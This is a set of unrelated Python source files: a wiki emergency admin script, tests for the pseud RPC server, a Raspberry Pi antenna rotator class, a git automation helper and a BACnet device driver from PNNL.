t = threading.Thread(target = parser, args = [test])
t.start()
t.join()
if num % 10 == 0:
print(num)
elif what_i_do == '2':
curs.execute("delete from other where name = 'recaptcha'")
curs.execute("delete from other where name = 'sec_re'")
elif what_i_do == '3':
print('----')
print('IP or Name : ', end = '')
user_data = input()
if re.search("^([0-9]{1,3}\.[0-9]{1,3})$", user_data):
band = 'O'
else:
band = ''
curs.execute("insert into rb (block, end, today, blocker, why, band) values (?, ?, ?, ?, ?, ?)",
[user_data,
'release',
get_time(),
'tool:emergency',
'',
band
])
curs.execute("delete from ban where block = ?", [user_data])
elif what_i_do == '4':
print('----')
print('Host : ', end = '')
host = input()
curs.execute("update other set data = ? where name = 'host'", [host])
elif what_i_do == '5':
print('----')
print('Port : ', end = '')
port = int(input())
curs.execute("update other set data = ? where name = 'port'", [port])
elif what_i_do == '6':
print('----')
print('Skin\'s name : ', end = '')
skin = input()
curs.execute("update other set data = ? where name = 'skin'", [skin])
elif what_i_do == '7':
print('----')
print('1. sha256')
print('2. sha3')
print('----')
print('Select : ', end = '')
what_i_do = int(input())
print('----')
print('User\'s name : ', end = '')
user_name = input()
print('----')
print('User\'s password : ', end = '')
user_pw = input()
if what_i_do == '1':
hashed = hashlib.sha256(bytes(user_pw, 'utf-8')).hexdigest()
else:
if sys.version_info < (3, 6):
hashed = sha3.sha3_256(bytes(user_pw, 'utf-8')).hexdigest()
else:
hashed = hashlib.sha3_256(bytes(user_pw, 'utf-8')).hexdigest()
curs.execute("update user set pw = ? where id = ?", [hashed, user_name])
elif what_i_do == '8':
curs.execute("update other set data = '00000' where name = 'ver'")
elif what_i_do == '9':
print('----')
print('DB name (data) : ', end = '')
db_name = input()
if db_name == '':
db_name = 'data'
sqlite3.connect(db_name + '.db', check_same_thread = False)
elif what_i_do == '10':
try:
os.remove('data/set.json')
except:
pass
conn.commit()
print('----')
print('OK')
|
test_server.py
|
from __future__ import unicode_literals
import os.path
import threading
import time
from future.builtins import str
import zmq
from zmq.eventloop import ioloop, zmqstream
import tornado.testing
ioloop.install()
def test_server_creation():
from pseud import Server
user_id = b'echo'
server = Server(user_id)
assert server.user_id == user_id
assert server.security_plugin == 'noop_auth_backend'
def test_server_can_bind():
from pseud import Server
user_id = b'echo'
endpoint = 'inproc://{}'.format(__name__).encode()
server = Server(user_id,
security_plugin='noop_auth_backend')
server.bind(endpoint)
def test_server_can_connect():
from pseud import Server
user_id = b'echo'
endpoint = b'tcp://127.0.0.1:5000'
server = Server(user_id,
security_plugin='noop_auth_backend')
server.connect(endpoint)
def test_server_with_its_loop_instance():
from pseud import SyncClient, Server
endpoint = b'ipc:///tmp/test_socket'
def start_server():
server = Server(b'a')
server.bind(endpoint)
server.register_rpc(str.lower)
server.io_loop.add_timeout(server.io_loop.time() + .2,
server.stop)
server.start()
server_thread = threading.Thread(target=start_server)
server_thread.start()
client = SyncClient()
client.connect(endpoint)
result = client.lower('TOTO')
assert result == 'toto'
class ServerTestCase(tornado.testing.AsyncTestCase):
timeout = 2
def make_one_client_socket(self, endpoint):
context = zmq.Context.instance()
req_sock = context.socket(zmq.ROUTER)
req_sock.connect(endpoint)
return req_sock
def make_one_server(self, user_id, endpoint):
from pseud import Server
server = Server(user_id, io_loop=self.io_loop)
server.bind(endpoint)
return server
@tornado.testing.gen_test
def test_job_running(self):
from pseud.common import msgpack_packb
from pseud.interfaces import EMPTY_DELIMITER, OK, VERSION, WORK
from pseud.utils import register_rpc
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
@register_rpc
def job_success(a, b, c, d=None):
time.sleep(.2)
return True
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('job_success', (1, 2, 3), {'d': False}))
yield tornado.gen.Task(stream.send_multipart,
[user_id, EMPTY_DELIMITER, VERSION, b'',
WORK, work])
yield server.start()
response = yield tornado.gen.Task(stream.on_recv)
assert response == [user_id, EMPTY_DELIMITER, VERSION, b'',
OK, msgpack_packb(True)]
server.stop()
@tornado.testing.gen_test
def test_job_not_found(self):
import pseud
from pseud.common import msgpack_packb, msgpack_unpackb
from pseud.interfaces import EMPTY_DELIMITER, ERROR, VERSION, WORK
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('thisIsNotAFunction', (), {}))
yield server.start()
yield tornado.gen.Task(stream.send_multipart,
[user_id, EMPTY_DELIMITER, VERSION, b'', WORK,
work])
response = yield tornado.gen.Task(stream.on_recv)
assert response[:-1] == [user_id, EMPTY_DELIMITER, VERSION, b'',
ERROR]
klass, message, traceback = msgpack_unpackb(response[-1])
assert klass == 'ServiceNotFoundError'
assert message == 'thisIsNotAFunction'
# pseud.__file__ might ends with .pyc
assert os.path.dirname(pseud.__file__) in traceback
server.stop()
@tornado.testing.gen_test
def test_job_raise(self):
from pseud.common import msgpack_packb, msgpack_unpackb
from pseud.interfaces import ERROR, VERSION, WORK
from pseud.utils import register_rpc
user_id = b'echo'
endpoint = 'inproc://{}'.format(self.__class__.__name__).encode()
@register_rpc
def job_buggy(*args, **kw):
raise ValueError('too bad')
server = self.make_one_server(user_id, endpoint)
socket = self.make_one_client_socket(endpoint)
stream = zmqstream.ZMQStream(socket, io_loop=self.io_loop)
work = msgpack_packb(('job_buggy', (), {}))
yield server.start()
yield tornado.gen.Task(stream.send_multipart,
[user_id, b'', VERSION, b'', WORK, work])
response = yield tornado.gen.Task(stream.on_recv)
assert response[:-1] == [user_id, b'', VERSION, b'', ERROR]
klass, message, traceback = msgpack_unpackb(response[-1])
assert klass == 'ValueError'
assert message == 'too bad'
assert __file__ in traceback
server.stop()
|
rotator.py
|
#! /usr/bin/env python3
"""
Object file for class interfacing with antenna rotator
author: Marion Anderson
date: 2018-06-17
file: rotator.py
"""
from __future__ import absolute_import, print_function
import os
import time
from multiprocessing import Lock, Process
import pigpio
class RotatorClassException(Exception):
"""Provide exceptions for Rotator class"""
pass
class Rotator(object):
"""
Interface to antenna rotator using a stepper motor and a servo.
See this link for PiGPIO documentation:
http://abyz.me.uk/rpi/pigpio/index.html
See Raspberry Pi pinout here:
https://pinout.xyz/#
"""
def __init__(self, pin_az, pin_el, pin_dir, step_angle=1.8, step_delay=5):
"""Create basic antenna rotator instancece
:param pin_az: GPIO pin for incrementing step
:type pin_azfwd: length-4 int array
:param pin_el: GPIO pin for elevation servo
:type pin_el: int
:param pin_dir: GPIO pin controlling stepper direction
:type pin_dir: int
:param step_angle: Az control step angle in degrees (Default: 1.8)
:type step_angle: float
:param step_delay: Delay between phases in milliseconds (Default: 5)
:type step_delay: float
.. note::
See Raspberry Pi and your motors' documentation for acceptable
parameter values for your equipment.
.. note::
Servos are not attached by default. Run `rotator.attach()` to reserve
system resources.
"""
# Assigning motor params
self.pin_az = pin_az
self.pin_el = pin_el
self.pin_dir = pin_dir
self.step_angle = step_angle
self.step_delay = step_delay
# Determining current position
homepath = os.environ['HOME']
self.statepath = homepath + '/.satcomm/rotator-state.conf'
# Check state file exists and is valid, otherwise assume zero position
if os.path.isfile(self.statepath):
self.statefile = open(self.statepath, 'r')
state = self.statefile.read()
try:
self.az = float(state[state.index('Az:')+3:state.index('El:')])
self.el = float(state[state.index('El:')+3:])
except ValueError:
print('Bad state file! Assuming zero position.')
self.az = 0
self.el = 0
self.statefile.close()
self.statefile = open(self.statepath, 'w')
else:
self.az = 0
self.el = 0
self.statefile = open(self.statepath, 'w') # write first
self._savestate()
# other parameters
self.pi = None # pigpio interface object
self.num_pts = 4 # internal const for _spline_trajectory()
self.attached = False
self.mutex = Lock()
def attach(self):
"""Initiate rotator control interface.
.. note::
See Raspberry Pi pinout here: https://pinout.xyz/#
"""
self.pi = pigpio.pi() # reserving daemon resources
# Set all pins to output
self.pi.set_mode(self.pin_az, pigpio.OUTPUT)
self.pi.set_mode(self.pin_dir, pigpio.OUTPUT)
self.pi.set_mode(self.pin_el, pigpio.OUTPUT)
# Force output low
self.pi.set_servo_pulsewidth(self.pin_el, 0)
self.pi.write(self.pin_az, 0)
self.pi.write(self.pin_dir, 0)
self.attached = True
def detach(self):
"""Stop servo and release PWM resources."""
self.pi.stop() # releases resources used by pigpio daemon
self.statefile.close() # close file stream
self.attached = False
def zero(self):
"""Move rotator to default position: 0deg Az, 0deg El."""
if not self.attached:
raise RotatorClassException('Rotator not attached')
self.write(0, 0)
def calibrate(self):
"""Calibrate rotator by sequentially moving it to
well-defined positions.
"""
input('Press enter to zero rotator: ')
self.zero()
# Azimuth calibration
for az in (90, 180, 270):
input('Press enter to move to {0} degrees Azimuth: '.format(az))
time.sleep(0.01)
self.write(az, 0)
input('Press enter to zero rotator again: ')
time.sleep(0.25)
self.zero()
# Elevation calibration
for el in (-10, 30, 45, 60, 80):
input('Press enter to move to {0} degrees Elevation: '.format(el))
time.sleep(0.01)
self.write(0, el)
# Return to home position
input('Calibration finished!\nPress enter to return to zero: ')
self.zero()
def write(self, az, el):
"""Move rotator to an orientation given in degrees.
Handles input processing and commanding. The individual commands
update the state variables.
:param az: Azimuth angle
:type az: float
:param el: Elevation angle
:type el: float
.. note::
The interal az and el methods process input and save the state
"""
if not self.attached:
raise RotatorClassException('Rotator not attached!')
# Command motors
# use threading to allow simultaneous execution
# TODO: Implement splining
thread_az = Process(target=self._write_az, args=(az,))
thread_el = Process(target=self._write_el, args=(el,))
thread_az.start()
thread_el.start()
thread_az.join()
thread_el.join()
def _write_el(self, degrees):
"""Lowlevel servo elevation control (internal method).
:param degrees: Angle to move servo
:type degrees: float
.. note::
This is the only function that directly writes to the servos (which
must be done in microseconds). This allows the rest of the class to
operate in degrees. It also keeps the code more Pythonic.
.. note::
The degrees to microseconds conversion uses a line fit with two points:
(0deg, 500us), (180deg, 2500us).
Therefore the coefficients are:
m = (2500 - 500) / (180 - 0) = 200 / 18
b = 500
"""
# Input processing
degrees += 90 # 0deg el is the servo midpoint, no 90deg servo
if degrees > 180 or degrees < 0:
exceptstr = 'Servo angle is constrained between -10 and 90deg'
raise RotatorClassException(exceptstr)
if degrees == self.el: # don't write if not moving
return
# Move servo and then hold it in that position
# TODO: Decide if resetting pulsewidth is necessary
us = 200 / 18.0 * degrees + 500 # eq: (2500-500)/(180-0) + 500
self.mutex.acquire()
self.pi.set_servo_pulsewidth(self.pin_el, us)
# time.sleep(0.2) # experimentally determined delay
# self.pi.set_servo_pulsewidth(self.pin_el, 0)
self.mutex.release()
# Save state
self.el = degrees - 90
self.mutex.acquire()
self._savestate()
self.mutex.release()
def _write_az(self, degrees):
"""Low level stepper azimuth control (internal method).
:param degrees: Desired azimuth position in degrees
:type degrees: float
"""
# Input Processing
degrees %= 360 # azimuth wraps at 2pi
if degrees == self.az: # don't write if not moving
return
# Decide direction by minimizing angular distance
# Lots of if cases for figuring out what the right calculation is
# basically figuring out which side of the line between pos and its
# antipode you're on will tell
degrees %= 360 # wrap at 2pi
posmirror = (degrees + 180) % 360 # antipode of degrees
if self.az < posmirror and self.az > degrees:
cw = True
dist = self.az - degrees
elif degrees > 180 and self.az > degrees:
cw = True
dist = self.az - degrees
elif degrees > 180 and self.az < posmirror:
cw = True
dist = 360 + self.az - degrees
elif self.az < degrees and self.az > posmirror:
cw = False
dist = degrees - self.az
elif degrees < 180 and self.az < degrees:
cw = False
dist = degrees - self.az
elif degrees < 180 and self.az > posmirror:
cw = False
dist = 360 + degrees - self.az
else: # just compute distance and go ccw if pos dist, cw if neg dist
dist = abs(degrees - self.az)
cw = True if self.az < degrees else False
# Step motor
if cw:
self.pi.write(self.dir_pin, 1)
else:
self.pi.write(self.dir_pin, 0)
time.sleep(self.step_delay) # setup time
# Determine num steps and rotate
# CW
if cw:
self.pi.write(self.pin_dir, 1) # CW mode
time.sleep(0.001) # propagation delay
steps = round(dist / self.step_angle) # how many steps
for i in range(steps):
self.mutex.acquire()
self.pi.write(self.pin_az, 1)
time.sleep(self.step_delay / 1000.0) # delay in ms
self.pi.write(self.pin_az, 0)
self.mutex.release()
time.sleep(self.step_delay / 1000.0)
# CCW
else:
self.pi.write(self.pin_dir, 0) # CCW mode
time.sleep(0.001) # propagation delay
steps = round(dist / self.step_angle) # how many steps
for i in range(steps):
self.mutex.acquire()
self.pi.write(self.pin_az, 1)
time.sleep(self.step_delay / 1000.0)
self.pi.write(self.pin_az, 0)
self.mutex.release()
time.sleep(self.step_delay / 1000.0)
# Record actual azimuth
self.az = steps * self.step_angle # save actual azimuth
self.mutex.acquire()
self._savestate()
self.mutex.release()
def _savestate(self):
"""Overwrites rotator position to persistent file (internal method).
.. note::
Update az and el BEFORE calling this method.
"""
self.statefile.truncate(0) # wipe file
self.statefile.write('Az:{:.0f}El:{:.0f}'.format(self.az, self.el))
self.statefile.flush()
# TODO: Test spline generation
def _spline_trajectory(self, p0, pf, dt=0.25):
"""Generate a smoothed servo movement trajectory over time dt.
:param p0: Initial angular position of servo in degrees.
:type p0: float
:param pf: Final angular position of servo in degrees.
:type pf: float
:param dt: Time to reach final position in seconds. (Default 0.25)
:type dt: float
:returns: tuple of positions in degrees
:rtype: float tuple
.. note::
These equations use the assumption that initial and final velocities
are 0. You should be able to find them in any robotics text covering
trajectory generation for manipulators.
.. note::
The delay time between movements should be dt / Rotator.num_pts.
All movements are in equal amounts of time
"""
# default case: p0 = pf
coeffs = [0] * self.num_pts # spline coefficient array
degrees = [p0] * self.num_pts # trajectory
# movement case
if p0 != pf:
# spline coefficients in degrees:
coeffs[3] = p0
coeffs[2] = 0
coeffs[1] = 3/pow(dt, 2) * (pf - p0)
coeffs[0] = 2/pow(dt, 3) * (-pf + p0)
# computing trajectory points:
# skip 1st value because it's just p0, and that is covered in
# the default case above
for i in range(1, self.num_pts):
t = dt / self.num_pts * i # time in trajectory
degrees[i] = (coeffs[0] * pow(t, 3) + coeffs[1] * pow(t, 2) +
coeffs[2] * t + coeffs[3])
return tuple(degrees)
if __name__ == '__main__':
print('This is the Rotator class file!')
|
repo.py
|
import os
from dataclasses import dataclass, field
from threading import Thread
from typing import Dict, List, Union
import cli
from plib import Path
from . import vpn
no_pull_changes_message = "Already up to date."
def ask_push():
response = cli.prompt("Commit message", default=False)
return response
def is_remote(command: str) -> bool:
return command in ("push", "pull")
def is_reachable(remote: str) -> bool:
return cli.check_succes(f"ping -c 1 {remote}")
def is_vpn_error(exc: Exception):
vpn_error_messages = ("Could not resolve host", "status 128")
error_message = str(exc)
return any(m in error_message for m in vpn_error_messages)
@dataclass
class Repo:
path: Path
pull_output: str = None
changes: str = None
status: List[str] = field(default_factory=list)
committed: List[str] = field(default_factory=list)
update: bool = False
vpn_activated: bool = False
changed_files: Union[Dict[str, str], None] = None
@property
def title(self) -> str:
return self.path.name.capitalize()
@property
def auto_add(self) -> bool:
auto_add_skip_file = Path.assets / "autogit" / "skip_auto_add.yaml"
return self.path.name not in auto_add_skip_file.yaml
def check_updates(self):
self.changes = (
self.get("diff") or self.get("ls-files --others --exclude-standard")
if self.auto_add
else ""
)
self.status = self.get_status() if self.auto_add else []
# committed before but the push has failed
self.committed = not (self.changes or self.status) and [
line
for line in self.lines("status --porcelain -b")
if "ahead" in line and "##" in line
]
self.update = bool(self.changes or self.status or self.committed)
def process_updates(self):
self.clear()
if self.changes:
self.add()
if self.status or self.committed:
if self.status:
self.show_status()
pull = Thread(target=self.do_pull, kwargs={"check": False})
pull.start()
commit_message = ask_push()
while commit_message == "show":
self.clear()
self.show_status(verbose=True)
commit_message = ask_push()
if commit_message and len(commit_message) > 5:
with cli.console.status("Formatting"):
self.run_hooks()
if self.status:
pull.join()
self.get(f'commit -m"{commit_message}"')
self.run("push")
else:
print("cleaned")
else:
commit_info = self.committed[0].replace("[", "\[").replace("## ", "")
if cli.confirm(f"Push ({commit_info}) ?", default=True):
self.run("push")
cli.run("clear")
else:
print("cleaned")
def run_hooks(self, real_commit=True):
# only lint python files
python_files_changed = [f for f in self.changed_files if f.endswith(".py")]
if python_files_changed:
cli.get("isort --apply -q", *python_files_changed, cwd=self.path)
if real_commit:
if (self.path / ".pre-commit-config.yaml").exists():
cli.get("pre-commit run", check=False, cwd=self.path)
self.add()
elif python_files_changed:
cli.run("black -q", *python_files_changed, cwd=self.path)
def show_status(self, verbose=False):
if self.changed_files is None:
self.changed_files = {
filenames[-1]: symbol
for line in self.status
for symbol, *filenames in (line.split(),)
}
status = self.lines("status -v", capture_output_tty=True)
diff_indices = [i for i, line in enumerate(status) if "diff" in line] + [
len(status)
]
lines_amount = os.get_terminal_size().lines * 2 - 6
symbols = {"M": "*", "D": "-", "A": "+", "R": "*", "C": "*"}
colors = {"M": "blue", "D": "red", "A": "green", "R": "blue", "C": "blue"}
for start, stop in zip(diff_indices, diff_indices[1:]):
title = status[start]
for filename, symbol in self.changed_files.items():
if filename in title:
color = colors.get(symbol, "")
line = symbols.get(symbol, "") + f" [bold {color}]{filename}\n"
cli.console.print(line, end="")
diff = [
part
for line in status[start:stop]
for part in line.split("@@")
if "\x1b[1m" not in line
] + [""]
if lines_amount > len(diff) or verbose:
lines_amount -= len(diff)
for d in diff:
print(d)
def clear(self):
cli.console.clear()
cli.console.rule(self.title)
def add(self):
self.get("add .")
self.status = self.get_status()
def get_status(self):
return self.lines("status --porcelain")
def do_pull(self, check=True):
self.pull_output = self.get("pull", check=check)
def show_pull(self):
if no_pull_changes_message not in self.pull_output:
self.clear()
print(self.pull_output)
return True
def lines(self, command, **kwargs):
lines = self.get(command, **kwargs).split("\n")
lines = [l for l in lines if l]
return lines
def get(self, command, **kwargs):
output = self.run(command, **kwargs, capture_output=True)
if "capture_output_tty" not in kwargs:
output = output.stdout
return output.strip()
def run(self, command, **kwargs):
self.before_command(command)
try:
result = cli.run(f"git -C {self.path} {command}", **kwargs)
except Exception as e:
if is_vpn_error(e):
if command == "push":
pprint("Activating VPN..")
vpn.connect_vpn()
self.vpn_activated = True
result = cli.run(f"git -C {self.path} {command}", **kwargs)
elif command == "pull":
# ignore not reachable after vpn when pulling
result = cli.run(f"echo {no_pull_changes_message}", **kwargs)
else:
raise e
else:
raise e
self.after_command(command)
return result
def before_command(self, command):
if is_remote(command):
url = self.get("config remote.origin.url")
self.check_password(url)
def check_password(self, url):
if "@" not in url:
url = url.replace("https://", f'https://{os.environ["gittoken"]}@')
self.run(f"config remote.origin.url {url}")
def check_vpn(self, url):
domain = url.split("@")[1].split("/")[0]
if not is_reachable(domain):
vpn.connect_vpn()
self.vpn_activated = True
def after_command(self, _):
if self.vpn_activated:
vpn.disconnect_vpn()
self.vpn_activated = False
|
bacnet.py
|
'''
Copyright (c) 2016, Battelle Memorial Institute
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those
of the authors and should not be interpreted as representing official policies,
either expressed or implied, of the FreeBSD Project.
'''
'''
This material was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the United States Department of Energy, nor Battelle,
nor any of their employees, nor any jurisdiction or organization
that has cooperated in the development of these materials, makes
any warranty, express or implied, or assumes any legal liability
or responsibility for the accuracy, completeness, or usefulness or
any information, apparatus, product, software, or process disclosed,
or represents that its use would not infringe privately owned rights.
Reference herein to any specific commercial product, process, or
service by trade name, trademark, manufacturer, or otherwise does
not necessarily constitute or imply its endorsement, recommendation,
r favoring by the United States Government or any agency thereof,
or Battelle Memorial Institute. The views and opinions of authors
expressed herein do not necessarily state or reflect those of the
United States Government or any agency thereof.
PACIFIC NORTHWEST NATIONAL LABORATORY
operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
under Contract DE-AC05-76RL01830
'''
#!/usr/bin/python
"""
sample_http_server
"""
import os
from csv import DictReader
from collections import defaultdict
from ConfigParser import ConfigParser
from Queue import Queue, Empty
from twisted.internet.defer import Deferred
from twisted.python.failure import Failure
from twisted.internet import reactor
from base import BaseSmapVolttron, BaseRegister, BaseInterface
from bacpypes.debugging import class_debugging, ModuleLogger
from bacpypes.task import RecurringTask
from bacpypes.apdu import ConfirmedRequestSequence, WhoIsRequest
import bacpypes.core
import threading
#Tweeks to BACpypes to make it play nice with Twisted.
bacpypes.core.enable_sleeping()
bacpypes.core.SPIN = 0.1
from bacpypes.pdu import Address
from bacpypes.app import LocalDeviceObject, BIPSimpleApplication
from bacpypes.object import get_datatype
from bacpypes.apdu import (ReadPropertyRequest,
WritePropertyRequest,
Error,
AbortPDU,
ReadPropertyACK,
SimpleAckPDU,
ReadPropertyMultipleRequest,
ReadPropertyMultipleACK,
PropertyReference,
ReadAccessSpecification,
encode_max_apdu_response)
from bacpypes.primitivedata import Enumerated, Integer, Unsigned, Real, Boolean, Double
from bacpypes.constructeddata import Array, Any
from bacpypes.basetypes import ServicesSupported
from bacpypes.task import TaskManager
path = os.path.dirname(os.path.abspath(__file__))
configFile = os.path.join(path, "bacnet_example_config.csv")
#Make sure the TaskManager singleton exists...
task_manager = TaskManager()
# some debugging
_debug = 0
_log = ModuleLogger(globals())
# reference a simple application
this_application = None
server = None
#IO callback
class IOCB:
def __init__(self, request):
# requests and responses
self.ioRequest = request
self.ioDefered = Deferred()
@class_debugging
class BACnet_application(BIPSimpleApplication, RecurringTask):
def __init__(self, *args):
BIPSimpleApplication.__init__(self, *args)
RecurringTask.__init__(self, 250)
self.request_queue = Queue()
# assigning invoke identifiers
self.nextInvokeID = 1
# keep track of requests to line up responses
self.iocb = {}
self.install_task()
def process_task(self):
while True:
try:
iocb = self.request_queue.get(False)
except Empty:
break
self.request(iocb)
def submit_request(self, iocb):
self.request_queue.put(iocb)
def get_next_invoke_id(self, addr):
"""Called to get an unused invoke ID."""
initialID = self.nextInvokeID
while 1:
invokeID = self.nextInvokeID
self.nextInvokeID = (self.nextInvokeID + 1) % 256
# see if we've checked for them all
if initialID == self.nextInvokeID:
raise RuntimeError("no available invoke ID")
# see if this one is used
if (addr, invokeID) not in self.iocb:
break
return invokeID
def request(self, iocb):
apdu = iocb.ioRequest
if isinstance(apdu, ConfirmedRequestSequence):
# assign an invoke identifier
apdu.apduInvokeID = self.get_next_invoke_id(apdu.pduDestination)
# build a key to reference the IOCB when the response comes back
invoke_key = (apdu.pduDestination, apdu.apduInvokeID)
# keep track of the request
self.iocb[invoke_key] = iocb
BIPSimpleApplication.request(self, apdu)
def confirmation(self, apdu):
# build a key to look for the IOCB
invoke_key = (apdu.pduSource, apdu.apduInvokeID)
# find the request
iocb = self.iocb.get(invoke_key, None)
if iocb is None:
iocb.ioDefered.errback(RuntimeError("no matching request"))
return
del self.iocb[invoke_key]
if isinstance(apdu, AbortPDU):
iocb.ioDefered.errback(RuntimeError("Device communication aborted: " + str(apdu)))
return
if isinstance(apdu, Error):
iocb.ioDefered.errback(RuntimeError("Error during device communication: " + str(apdu)))
return
elif (isinstance(iocb.ioRequest, ReadPropertyRequest) and
isinstance(apdu, ReadPropertyACK)):
# find the datatype
datatype = get_datatype(apdu.objectIdentifier[0], apdu.propertyIdentifier)
if not datatype:
iocb.ioDefered.errback(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (apdu.propertyArrayIndex is not None):
if apdu.propertyArrayIndex == 0:
value = apdu.propertyValue.cast_out(Unsigned)
else:
value = apdu.propertyValue.cast_out(datatype.subtype)
else:
value = apdu.propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
iocb.ioDefered.callback(value)
elif (isinstance(iocb.ioRequest, WritePropertyRequest) and
isinstance(apdu, SimpleAckPDU)):
iocb.ioDefered.callback(apdu)
return
elif (isinstance(iocb.ioRequest, ReadPropertyMultipleRequest) and
isinstance(apdu, ReadPropertyMultipleACK)):
result_dict = {}
for result in apdu.listOfReadAccessResults:
# here is the object identifier
objectIdentifier = result.objectIdentifier
# now come the property values per object
for element in result.listOfResults:
# get the property and array index
propertyIdentifier = element.propertyIdentifier
propertyArrayIndex = element.propertyArrayIndex
# here is the read result
readResult = element.readResult
# check for an error
if readResult.propertyAccessError is not None:
error_obj = readResult.propertyAccessError
msg = 'ERROR DURRING SCRAPE (Class: {0} Code: {1})'
print msg.format(error_obj.errorClass, error_obj.errorCode)
else:
# here is the value
propertyValue = readResult.propertyValue
# find the datatype
datatype = get_datatype(objectIdentifier[0], propertyIdentifier)
if not datatype:
iocb.ioDefered.errback(TypeError("unknown datatype"))
return
# special case for array parts, others are managed by cast_out
if issubclass(datatype, Array) and (propertyArrayIndex is not None):
if propertyArrayIndex == 0:
value = propertyValue.cast_out(Unsigned)
else:
value = propertyValue.cast_out(datatype.subtype)
else:
value = propertyValue.cast_out(datatype)
if issubclass(datatype, Enumerated):
value = datatype(value).get_long()
result_dict[objectIdentifier[0], objectIdentifier[1], propertyIdentifier] = value
iocb.ioDefered.callback(result_dict)
else:
iocb.ioDefered.errback(TypeError('Unsupported Request Type'))
def block_for_sync(d, timeout=None):
q = Queue()
d.addBoth(q.put)
try:
ret = q.get(True, timeout)
except Empty:
raise IOError('Communication with device timed out.')
if isinstance(ret, Failure):
ret.raiseException()
else:
return ret
class BACnetRegister(BaseRegister):
def __init__(self, instance_number, object_type, property_name, read_only, pointName, units, description = ''):
super(BACnetRegister, self).__init__("byte", read_only, pointName, units, description = '')
self.instance_number = int(instance_number)
self.object_type = object_type
self.property = property_name
# find the datatype
self.datatype = get_datatype(object_type, property_name)
if self.datatype is None:
raise TypeError('Invalid Register Type')
if not issubclass(self.datatype, (Enumerated,
Unsigned,
Boolean,
Integer,
Real,
Double)):
raise TypeError('Invalid Register Type')
if issubclass(self.datatype, (Enumerated,
Unsigned,
Boolean,
Integer)):
self.python_type = int
else:
self.python_type = float
def get_state_async(self, bac_app, address):
request = ReadPropertyRequest(
objectIdentifier=(self.object_type, self.instance_number),
propertyIdentifier=self.property)
request.pduDestination = address
iocb = IOCB(request)
bac_app.submit_request(iocb)
return iocb.ioDefered
def get_state_sync(self, bac_app, address):
value = None
try:
value = block_for_sync(self.get_state_async(bac_app, address), 5)
except IOError as e:
print "Error with device communication:", e
return value
def set_state_async_callback(self, result, set_value):
if isinstance(result, SimpleAckPDU):
return set_value
raise RuntimeError("Failed to set value: " + str(result))
def set_state_async(self, bac_app, address, value):
if not self.read_only:
request = WritePropertyRequest(
objectIdentifier=(self.object_type, self.instance_number),
propertyIdentifier=self.property)
# save the value
if self.datatype is Integer:
value = int(value)
elif self.datatype is Real:
value = float(value)
bac_value = self.datatype(value)
request.propertyValue = Any()
request.propertyValue.cast_in(bac_value)
request.pduDestination = address
iocb = IOCB(request)
bac_app.submit_request(iocb)
iocb.ioDefered.addCallback(self.set_state_async_callback, value)
return iocb.ioDefered
raise TypeError('This register is read only.')
def set_state_sync(self, bac_app, address, value):
value = None
try:
value = block_for_sync(self.set_state_async(bac_app, address, value), 5)
except IOError as e:
print "Error with device communication:", e
return value
class BACnetInterface(BaseInterface):
def __init__(self, self_address, target_address,
max_apdu_len=1024, seg_supported='segmentedBoth',
obj_id=599, obj_name='sMap BACnet driver',
ven_id=15,
config_file=configFile, **kwargs):
super(BACnetInterface, self).__init__(**kwargs)
self.reverse_point_map = {}
self.object_property_map = defaultdict(list)
self.setup_device(self_address, max_apdu_len=max_apdu_len, seg_supported=seg_supported,
obj_id=obj_id, obj_name=obj_name,
ven_id=ven_id)
self.parse_config(config_file)
self.target_address = Address(target_address)
self.ping_target(self.target_address)
def insert_register(self, register):
super(BACnetInterface, self).insert_register(register)
self.reverse_point_map[register.object_type,
register.instance_number,
register.property] = register.point_name
self.object_property_map[register.object_type,
register.instance_number].append(register.property)
def ping_target(self, address):
#Some devices (mostly RemoteStation addresses behind routers) will not be reachable without
# first establishing the route to the device. Sending a directed WhoIsRequest is will
# settle that for us when the response comes back.
request = WhoIsRequest()
request.pduDestination = address
iocb = IOCB(request)
this_application.submit_request(iocb)
def setup_device(self, address,
max_apdu_len=1024, seg_supported='segmentedBoth',
obj_id=599, obj_name='sMap BACnet driver',
ven_id=15):
global this_application
#We use a singleton device
if this_application is not None:
return
print 'seg_supported', seg_supported
print 'max_apdu_len', max_apdu_len
print 'obj_id', obj_id
print 'obj_name', obj_name
print 'ven_id', ven_id
#Check to see if they gave a valid apdu length.
if encode_max_apdu_response(max_apdu_len) is None:
raise ValueError('Invalid max_apdu_len: Valid options are 50, 128, 206, 480, 1024, and 1476')
